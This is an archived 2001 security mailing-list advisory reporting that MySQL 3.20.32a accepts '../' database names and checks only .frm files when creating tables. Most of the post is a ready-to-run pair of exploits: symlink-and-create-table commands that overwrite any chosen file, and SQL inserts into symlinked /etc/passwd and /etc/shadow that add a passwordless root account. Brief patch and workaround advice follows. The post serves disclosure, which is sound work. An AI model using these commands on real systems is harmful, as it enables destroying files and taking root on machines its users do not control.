OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pavlov, Lesha (leshaNN.RU)
Date: Sun Mar 18 2001 - 12:32:37 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Anybody, who get login and password to mysql can use it as DoS or r00t
    exploit because mysql accepts '../blah-blah' as valid database name and
    each table represented by 3 files tablename.ISD, tablename.ISM and
    tablename.frm, But, when mysqld checks table already exists or not
    exists, it checks _only_ tablename.frm :

    Usage this "vulnerable features of mysql" to make big DoS (Will
    Overwrite any file you wish):
    $ cd /var/tmp
    $ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
    $ mysql -u user -h localhost -p somepassword '../../tmp'
    create table qqq(www int);
    \q
    $
    File /some/file/you/wish/to/overwrite will be overwritten.

    Usage as r00t exploit:
    $ cd /var/tmp
    $ ln -s /etc/passwd gotcha.ISD
    $ ln -s /etc/shadow make_me_r00t.ISD
    $ mysql -u user -h localhost -p somepassword '../../tmp'
    create table gotcha(qqq varchar(255));
    create table make_me_r00t(qqq varchar(255));
    insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
    insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
    \q
    $
    You getta r00t now!

    Recomendations:
    * Patch mysql to when check table presents, it checks all
    tablename.{ISD,ISM,frm} files, not only tablename.frm
    * Patch mysql to treat database names, started by '..' as incorrect
    database names.
    * And Main recomendation - do not run mysqld as root!!!

    Patches:
     not yet

    Workaround:
    chowns existing database tables to a normal user and run mysqld as this
    unprivileged user - it will be better solution!.

    Vulnerable versions:
    This DoS/exploit tested on mysql-3.20.32a but i see another versions of
    mysql also vulnerabile.

    Comments:
    Mysql dox recomends dont run mysqld as root, but People from RedHat
    didnt read mysql dox - mysql istalled from rpm is vulnerable.